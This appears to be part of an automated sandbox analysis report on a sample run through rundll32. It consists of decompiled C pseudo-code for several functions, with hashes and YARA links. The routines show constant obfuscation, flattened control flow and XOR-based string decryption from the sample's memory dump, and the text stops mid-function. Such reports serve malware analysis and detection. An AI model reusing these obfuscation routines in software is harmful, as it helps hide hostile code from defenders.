                                                                                                                          • Opcode ID: 02cfde5d70d92ca212a6bb0762004df0148329eab7078a50243751f0bda09c59
                                                                                                                          • Instruction ID: 399f7d9242e9ac85cf9711cbc2a53399655e10b64ccb7f88f97ecedaf37661db
                                                                                                                          • Opcode Fuzzy Hash: 02cfde5d70d92ca212a6bb0762004df0148329eab7078a50243751f0bda09c59
                                                                                                                          • Instruction Fuzzy Hash: 4D41C0326083419FCB65CF15E44A81FBBE2FBD8718F144A1DF58556221D7B8CA88CB87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00798B3D Relevance: 1.4, Strings: 1, Instructions: 109COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E00798B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t83;
				void* _t89;
				signed int _t93;
				void* _t96;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;

				_push(_a16);
				_t108 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t83);
				_v72 = 0xbb1237;
				_t112 = _t111 + 0x18;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xd544;
				_t109 = 0;
				_v72 = _v72 ^ 0x000eb3e9;
				_t96 = 0x815a082;
				_v48 = 0x50cb35;
				_v48 = _v48 + 0xffff87ec;
				_v48 = _v48 ^ 0x00585237;
				_v52 = 0xa4cd83;
				_v52 = _v52 ^ 0x5b114d95;
				_v52 = _v52 ^ 0x5bb6524d;
				_v56 = 0xbe8ecf;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0xa3b0842f;
				_v60 = 0x771210;
				_v60 = _v60 | 0x3e44f288;
				_v60 = _v60 ^ 0x3e758d5b;
				_v80 = 0xf3b10d;
				_v80 = _v80 ^ 0x3cb59f0c;
				_v80 = _v80 >> 4;
				_v80 = _v80 + 0xffffd90b;
				_v80 = _v80 ^ 0x03c55d5e;
				_v64 = 0x352515;
				_v64 = _v64 ^ 0x7339bda5;
				_v64 = _v64 + 0x1326;
				_v64 = _v64 ^ 0x7306d08c;
				_v68 = 0x4f62f3;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x83faab25;
				_v68 = _v68 ^ 0x6fa8977d;
				_v76 = 0x2ac691;
				_v76 = _v76 << 9;
				_t93 = 0x6b;
				_v76 = _v76 / _t93;
				_v76 = _v76 << 0xc;
				_v76 = _v76 ^ 0xcae566b9;
				do {
					while(_t96 != 0x54856a9) {
						if(_t96 == 0x815a082) {
							_t96 = 0x54856a9;
							continue;
						} else {
							if(_t96 == 0xa9da54a) {
								_t89 = E007AD97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
								_t112 = _t112 + 0xc;
								__eflags = _t89;
								if(__eflags != 0) {
									_t96 = 0xefea9c1;
									continue;
								}
							} else {
								_t118 = _t96 - 0xefea9c1;
								if(_t96 != 0xefea9c1) {
									goto L11;
								} else {
									E007AD97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E00793DBC( &_v44, _a8, _v72, _v48, _v52);
					_t112 = _t112 + 0xc;
					_t96 = 0xa9da54a;
					L11:
					__eflags = _t96 - 0x309e957;
				} while (__eflags != 0);
				goto L6;
			}





















                                                                                                                          0x00798b44
                                                                                                                          0x00798b48
                                                                                                                          0x00798b4a
                                                                                                                          0x00798b4e
                                                                                                                          0x00798b52
                                                                                                                          0x00798b56
                                                                                                                          0x00798b57
                                                                                                                          0x00798b58
                                                                                                                          0x00798b5d
                                                                                                                          0x00798b65
                                                                                                                          0x00798b68
                                                                                                                          0x00798b6f
                                                                                                                          0x00798b77
                                                                                                                          0x00798b79
                                                                                                                          0x00798b81
                                                                                                                          0x00798b86
                                                                                                                          0x00798b93
                                                                                                                          0x00798b9b
                                                                                                                          0x00798ba3
                                                                                                                          0x00798bab
                                                                                                                          0x00798bb3
                                                                                                                          0x00798bbb
                                                                                                                          0x00798bc3
                                                                                                                          0x00798bc8
                                                                                                                          0x00798bd0
                                                                                                                          0x00798bd8
                                                                                                                          0x00798be0
                                                                                                                          0x00798be8
                                                                                                                          0x00798bf0
                                                                                                                          0x00798bf8
                                                                                                                          0x00798bfd
                                                                                                                          0x00798c05
                                                                                                                          0x00798c0d
                                                                                                                          0x00798c15
                                                                                                                          0x00798c1d
                                                                                                                          0x00798c25
                                                                                                                          0x00798c2d
                                                                                                                          0x00798c35
                                                                                                                          0x00798c3a
                                                                                                                          0x00798c42
                                                                                                                          0x00798c4a
                                                                                                                          0x00798c52
                                                                                                                          0x00798c5d
                                                                                                                          0x00798c65
                                                                                                                          0x00798c69
                                                                                                                          0x00798c6e
                                                                                                                          0x00798c76
                                                                                                                          0x00798c76
                                                                                                                          0x00798c80
                                                                                                                          0x00798ce0
                                                                                                                          0x00000000
                                                                                                                          0x00798c82
                                                                                                                          0x00798c88
                                                                                                                          0x00798cd0
                                                                                                                          0x00798cd5
                                                                                                                          0x00798cd8
                                                                                                                          0x00798cda
                                                                                                                          0x00798cdc
                                                                                                                          0x00000000
                                                                                                                          0x00798cdc
                                                                                                                          0x00798c8a
                                                                                                                          0x00798c8a
                                                                                                                          0x00798c8c
                                                                                                                          0x00000000
                                                                                                                          0x00798c8e
                                                                                                                          0x00798ca2
                                                                                                                          0x00798caf
                                                                                                                          0x00798caf
                                                                                                                          0x00798c8c
                                                                                                                          0x00798c88
                                                                                                                          0x00798cb3
                                                                                                                          0x00798cbb
                                                                                                                          0x00798cbb
                                                                                                                          0x00798cf8
                                                                                                                          0x00798cfd
                                                                                                                          0x00798d00
                                                                                                                          0x00798d05
                                                                                                                          0x00798d05
                                                                                                                          0x00798d05
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 7RX
                                                                                                                          • API String ID: 0-861457431
                                                                                                                          • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                          • Instruction ID: 2fafb8270859364b2dcf1bbb161d03910585b426d6f8e087315932577c03741c
                                                                                                                          • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                          • Instruction Fuzzy Hash: 71417571109701DBCB94CE21D48982FBBE1FBC6B88F500A2DF59692220D775CA59CF97
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A7BA6 Relevance: 1.3, Strings: 1, Instructions: 97COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E007A7BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t53;
				signed int _t60;
				signed int _t67;
				unsigned int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				void* _t85;
				signed int _t92;
				void* _t98;
				intOrPtr _t99;
				signed int* _t100;
				signed int* _t101;
				signed int* _t102;

				_t100 = _a8;
				_t102 = __ecx;
				_push(_t100);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t53);
				_v12 = 0x7b3704;
				_t99 = 0;
				_v8 = 0x80915f;
				_v4 = 0;
				_v24 = 0xa71362;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0x3e5;
				_v24 = _v24 ^ 0x3895df4e;
				_v28 = 0xc4b4e;
				_t76 = 0x2f;
				_v28 = _v28 * 0x14;
				_v28 = _v28 | 0x55175d82;
				_v28 = _v28 ^ 0x65144985;
				_v28 = _v28 ^ 0x30e15ded;
				_a8 = 0x3b45b7;
				_a8 = _a8 / _t76;
				_a8 = _a8 << 4;
				_t77 = 0x6c;
				_a8 = _a8 / _t77;
				_a8 = _a8 ^ 0x000cc8ea;
				_t60 =  *_t100;
				_t101 =  &(_t100[2]);
				_t92 = _t100[1] ^ _t60;
				_v20 = _t60;
				_v16 = _t92;
				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
				_t67 = E00797FF2(_t71);
				_a8 = _t67;
				if(_t67 != 0) {
					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
					if(_t98 != 0) {
						_t74 = _v20;
						_t85 = _t67 - _t101;
						do {
							_t99 = _t99 + 1;
							 *(_t85 + _t101) =  *_t101 ^ _t74;
							_t101 =  &(_t101[1]);
						} while (_t99 < _t98);
						_t67 = _a8;
					}
					if(_t102 != 0) {
						 *_t102 = _v16;
						return _t67;
					}
				}
				return _t67;
			}
























                                                                                                                          0x007a7bac
                                                                                                                          0x007a7bb0
                                                                                                                          0x007a7bb3
                                                                                                                          0x007a7bb4
                                                                                                                          0x007a7bb8
                                                                                                                          0x007a7bb9
                                                                                                                          0x007a7bba
                                                                                                                          0x007a7bbf
                                                                                                                          0x007a7bc7
                                                                                                                          0x007a7bc9
                                                                                                                          0x007a7bd3
                                                                                                                          0x007a7bd7
                                                                                                                          0x007a7bdf
                                                                                                                          0x007a7be4
                                                                                                                          0x007a7bec
                                                                                                                          0x007a7bf4
                                                                                                                          0x007a7c03
                                                                                                                          0x007a7c06
                                                                                                                          0x007a7c0a
                                                                                                                          0x007a7c12
                                                                                                                          0x007a7c1a
                                                                                                                          0x007a7c22
                                                                                                                          0x007a7c32
                                                                                                                          0x007a7c36
                                                                                                                          0x007a7c3f
                                                                                                                          0x007a7c42
                                                                                                                          0x007a7c46
                                                                                                                          0x007a7c4e
                                                                                                                          0x007a7c53
                                                                                                                          0x007a7c56
                                                                                                                          0x007a7c58
                                                                                                                          0x007a7c5e
                                                                                                                          0x007a7c6f
                                                                                                                          0x007a7c83
                                                                                                                          0x007a7c88
                                                                                                                          0x007a7c90
                                                                                                                          0x007a7ca6
                                                                                                                          0x007a7cab
                                                                                                                          0x007a7cad
                                                                                                                          0x007a7cb3
                                                                                                                          0x007a7cb5
                                                                                                                          0x007a7cb9
                                                                                                                          0x007a7cba
                                                                                                                          0x007a7cbd
                                                                                                                          0x007a7cc0
                                                                                                                          0x007a7cc4
                                                                                                                          0x007a7cc4
                                                                                                                          0x007a7cca
                                                                                                                          0x007a7cd0
                                                                                                                          0x00000000
                                                                                                                          0x007a7cd0
                                                                                                                          0x007a7cca
                                                                                                                          0x007a7cda

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ]0
                                                                                                                          • API String ID: 0-3096761382
                                                                                                                          • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                          • Instruction ID: 4fcec43e8183eb6c5a7587da78b64d31e39f1f7b89a99867839ab1b919dd3fd7
                                                                                                                          • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                          • Instruction Fuzzy Hash: 813197716093008FD318CF29C88590BFBE6EBC9718F008A2EF58993251DBB5E905CB56
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00793C3C Relevance: 1.3, Strings: 1, Instructions: 94COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E00793C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v564;
				void* _t97;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t97);
				_v32 = 0xf161c0;
				_v32 = _v32 + 0xffff8ad4;
				_v32 = _v32 ^ 0x00fbd9a3;
				_v28 = 0xfc9039;
				_t114 = 0x1b;
				_v28 = _v28 / _t114;
				_t115 = 5;
				_v28 = _v28 * 0x6e;
				_v28 = _v28 ^ 0x040e4771;
				_v44 = 0x2ba482;
				_v44 = _v44 | 0x0543644d;
				_v44 = _v44 ^ 0x0568ae00;
				_v36 = 0xddb19;
				_t116 = 0x23;
				_v36 = _v36 / _t115;
				_v36 = _v36 ^ 0x000396ce;
				_v8 = 0xc420c0;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffff6316;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 ^ 0x001ea2c5;
				_v12 = 0xb92025;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xfe32;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x088e8322;
				_v24 = 0x144a1a;
				_v24 = _v24 + 0xffffa246;
				_v24 = _v24 + 0xffff01e3;
				_v24 = _v24 ^ 0x001122d6;
				_v16 = 0x7d3361;
				_v16 = _v16 / _t116;
				_v16 = _v16 << 4;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004840;
				_v20 = 0xb3d6e6;
				_v20 = _v20 ^ 0x61ac6c83;
				_v20 = _v20 ^ 0xeb92407c;
				_v20 = _v20 ^ 0x8a8fe9bf;
				_v40 = 0xbcf254;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xcf275652;
				_push(_v44);
				_push(_v28);
				E0079A918(_a4, _v40, _v36, _v8, E007ADCF7(_v32, 0x7917c0, _v40), _v12,  &_v564);
				E0079A8B0(_v24, _t107, _v16);
				return E007A1F8A(_v20, _v40,  &_v564);
			}


















                                                                                                                          0x00793c46
                                                                                                                          0x00793c49
                                                                                                                          0x00793c4c
                                                                                                                          0x00793c4f
                                                                                                                          0x00793c50
                                                                                                                          0x00793c51
                                                                                                                          0x00793c56
                                                                                                                          0x00793c5f
                                                                                                                          0x00793c66
                                                                                                                          0x00793c6d
                                                                                                                          0x00793c79
                                                                                                                          0x00793c7e
                                                                                                                          0x00793c87
                                                                                                                          0x00793c8a
                                                                                                                          0x00793c8d
                                                                                                                          0x00793c94
                                                                                                                          0x00793c9b
                                                                                                                          0x00793ca2
                                                                                                                          0x00793ca9
                                                                                                                          0x00793cb5
                                                                                                                          0x00793cb6
                                                                                                                          0x00793cbb
                                                                                                                          0x00793cc2
                                                                                                                          0x00793cc9
                                                                                                                          0x00793ccd
                                                                                                                          0x00793cd8
                                                                                                                          0x00793cdb
                                                                                                                          0x00793ce2
                                                                                                                          0x00793ce9
                                                                                                                          0x00793ced
                                                                                                                          0x00793cf4
                                                                                                                          0x00793cf8
                                                                                                                          0x00793cff
                                                                                                                          0x00793d06
                                                                                                                          0x00793d0d
                                                                                                                          0x00793d14
                                                                                                                          0x00793d1b
                                                                                                                          0x00793d2c
                                                                                                                          0x00793d2f
                                                                                                                          0x00793d33
                                                                                                                          0x00793d37
                                                                                                                          0x00793d3e
                                                                                                                          0x00793d45
                                                                                                                          0x00793d4c
                                                                                                                          0x00793d53
                                                                                                                          0x00793d5a
                                                                                                                          0x00793d61
                                                                                                                          0x00793d65
                                                                                                                          0x00793d6c
                                                                                                                          0x00793d6f
                                                                                                                          0x00793d90
                                                                                                                          0x00793d9d
                                                                                                                          0x00793dbb

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: a3}
                                                                                                                          • API String ID: 0-1821053108
                                                                                                                          • Opcode ID: 598b7658c976f58b6b23dfcb50c5aab6a4f1dbecc69da458daf606b71033e245
                                                                                                                          • Instruction ID: d940351a65acdffc36f0101095b05b1535a4eb2a1bbb4a0ad4ce32f67a7de812
                                                                                                                          • Opcode Fuzzy Hash: 598b7658c976f58b6b23dfcb50c5aab6a4f1dbecc69da458daf606b71033e245
                                                                                                                          • Instruction Fuzzy Hash: 1E410172D0120AEBCF09CFE0D94A4EEBBB2FB48314F208159E510B6260C7B95B55DFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A8606 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E007A8606(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t46;
				signed int _t50;
				unsigned int* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t78;
				signed int* _t79;
				signed int* _t80;
				unsigned int _t82;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t93;

				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push(__edx);
				E007A20B9(_t46);
				 *(_t92 + 0x20) = 0xe2d3c4;
				_t79 =  &(__edx[1]);
				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
				 *(_t92 + 0x28) = 0xf8496b;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
				 *(_t92 + 0x24) = 0x2326e4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
				_t66 =  *__edx;
				_t80 =  &(_t79[1]);
				_t50 =  *_t79 ^ _t66;
				 *(_t92 + 0x2c) = _t66;
				 *(_t92 + 0x30) = _t50;
				_t30 = _t50 + 1; // 0xb
				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
				_t93 = _t92 + 0xc;
				_t63 = E00797FF2(_t82);
				 *(_t93 + 0x1c) = _t63;
				if(_t63 != 0) {
					_t90 = 0;
					_t78 = _t63;
					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
					if(_t88 != 0) {
						_t64 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t80;
							_t80 =  &(_t80[1]);
							_t73 = _t72 ^ _t64;
							 *_t78 = _t73;
							_t78 =  &(_t78[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t78 - 3)) = _t73 >> 8;
							 *(_t78 - 2) = _t74;
							_t90 = _t90 + 1;
							 *((char*)(_t78 - 1)) = _t74 >> 8;
						} while (_t90 < _t88);
						_t63 =  *(_t93 + 0x18);
					}
					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t63;
			}



















                                                                                                                          0x007a860c
                                                                                                                          0x007a8610
                                                                                                                          0x007a8614
                                                                                                                          0x007a8618
                                                                                                                          0x007a861a
                                                                                                                          0x007a861f
                                                                                                                          0x007a8627
                                                                                                                          0x007a862a
                                                                                                                          0x007a8632
                                                                                                                          0x007a8637
                                                                                                                          0x007a863f
                                                                                                                          0x007a8647
                                                                                                                          0x007a864f
                                                                                                                          0x007a8659
                                                                                                                          0x007a865d
                                                                                                                          0x007a8665
                                                                                                                          0x007a866d
                                                                                                                          0x007a8675
                                                                                                                          0x007a867a
                                                                                                                          0x007a8682
                                                                                                                          0x007a8686
                                                                                                                          0x007a8689
                                                                                                                          0x007a868b
                                                                                                                          0x007a868f
                                                                                                                          0x007a8693
                                                                                                                          0x007a86a3
                                                                                                                          0x007a86ae
                                                                                                                          0x007a86bc
                                                                                                                          0x007a86be
                                                                                                                          0x007a86c6
                                                                                                                          0x007a86ce
                                                                                                                          0x007a86d0
                                                                                                                          0x007a86e1
                                                                                                                          0x007a86e6
                                                                                                                          0x007a86e8
                                                                                                                          0x007a86ec
                                                                                                                          0x007a86ec
                                                                                                                          0x007a86ee
                                                                                                                          0x007a86f1
                                                                                                                          0x007a86f3
                                                                                                                          0x007a86fa
                                                                                                                          0x007a86fd
                                                                                                                          0x007a8700
                                                                                                                          0x007a8703
                                                                                                                          0x007a8709
                                                                                                                          0x007a870a
                                                                                                                          0x007a870d
                                                                                                                          0x007a8711
                                                                                                                          0x007a8711
                                                                                                                          0x007a871a
                                                                                                                          0x007a871a
                                                                                                                          0x007a8726

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: &#
                                                                                                                          • API String ID: 0-2240308938
                                                                                                                          • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                          • Instruction ID: a50c5a69ecc830dfe89021029dae742592745245b24b16415524b0766ca35001
                                                                                                                          • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                          • Instruction Fuzzy Hash: E43148726083518FC305DE28C88581BFBE0FF98718F054B6DE88AA7211D774EA09CB96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007ADCF7 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E007ADCF7(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t39;
				signed int _t43;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t70;
				unsigned int _t71;
				unsigned int _t72;
				signed int _t76;
				signed int* _t77;
				signed int* _t78;
				unsigned int _t80;
				void* _t86;
				short _t88;
				void* _t90;
				void* _t91;

				_push( *(_t90 + 0x28));
				_push( *(_t90 + 0x28));
				_push(__edx);
				E007A20B9(_t39);
				 *(_t90 + 0x24) = 0xf19f37;
				_t77 =  &(__edx[1]);
				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
				 *(_t90 + 0x20) = 0xb1a340;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
				 *(_t90 + 0x1c) = 0x9743e1;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
				_t63 =  *__edx;
				_t78 =  &(_t77[1]);
				_t43 =  *_t77 ^ _t63;
				 *(_t90 + 0x28) = _t63;
				 *(_t90 + 0x2c) = _t43;
				_t21 = _t43 + 1; // 0xf19f38
				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
				_t91 = _t90 + 8;
				_t60 = E00797FF2(_t80 + _t80);
				 *(_t91 + 0x1c) = _t60;
				if(_t60 != 0) {
					_t88 = 0;
					_t76 = _t60;
					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
					if(_t86 != 0) {
						_t61 =  *(_t91 + 0x1c);
						do {
							_t70 =  *_t78;
							_t78 =  &(_t78[1]);
							_t71 = _t70 ^ _t61;
							 *_t76 = _t71 & 0x000000ff;
							_t76 = _t76 + 8;
							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
							_t72 = _t71 >> 0x10;
							_t88 = _t88 + 1;
							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
						} while (_t88 < _t86);
						_t60 =  *(_t91 + 0x18);
					}
					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
				}
				return _t60;
			}



















                                                                                                                          0x007adcfd
                                                                                                                          0x007add01
                                                                                                                          0x007add05
                                                                                                                          0x007add07
                                                                                                                          0x007add0c
                                                                                                                          0x007add14
                                                                                                                          0x007add1c
                                                                                                                          0x007add20
                                                                                                                          0x007add28
                                                                                                                          0x007add30
                                                                                                                          0x007add38
                                                                                                                          0x007add40
                                                                                                                          0x007add48
                                                                                                                          0x007add50
                                                                                                                          0x007add58
                                                                                                                          0x007add5c
                                                                                                                          0x007add5f
                                                                                                                          0x007add61
                                                                                                                          0x007add65
                                                                                                                          0x007add69
                                                                                                                          0x007add79
                                                                                                                          0x007add84
                                                                                                                          0x007add93
                                                                                                                          0x007add95
                                                                                                                          0x007add9d
                                                                                                                          0x007adda5
                                                                                                                          0x007adda7
                                                                                                                          0x007addb8
                                                                                                                          0x007addbd
                                                                                                                          0x007addbf
                                                                                                                          0x007addc3
                                                                                                                          0x007addc3
                                                                                                                          0x007addc5
                                                                                                                          0x007addc8
                                                                                                                          0x007addcd
                                                                                                                          0x007addd5
                                                                                                                          0x007adddb
                                                                                                                          0x007adddf
                                                                                                                          0x007adde8
                                                                                                                          0x007adde9
                                                                                                                          0x007addf0
                                                                                                                          0x007addf4
                                                                                                                          0x007addf8
                                                                                                                          0x007addf8
                                                                                                                          0x007ade03
                                                                                                                          0x007ade03
                                                                                                                          0x007ade0f

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: g|E
                                                                                                                          • API String ID: 0-3824901942
                                                                                                                          • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                          • Instruction ID: c9920c5dc08f07355f030acebc7c9d21aee3bb5ad531f3952306819460494f18
                                                                                                                          • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                          • Instruction Fuzzy Hash: CA317C766083118FC714DF29C48546AF7E0FF88318F414B6EE88AAB251D774EA09CB96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007951BB Relevance: 1.3, Strings: 1, Instructions: 81COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E007951BB() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t72;
				intOrPtr _t83;
				signed int _t87;
				signed int _t88;
				signed int _t89;

				_v28 = _v28 & 0x00000000;
				_v32 = 0x54cf7d;
				_v16 = 0x3835ff;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 * 0x17;
				_v16 = _v16 ^ 0x00095bb8;
				_t72 = 0xe98fb1d;
				_v24 = 0x583681;
				_t87 = 0x44;
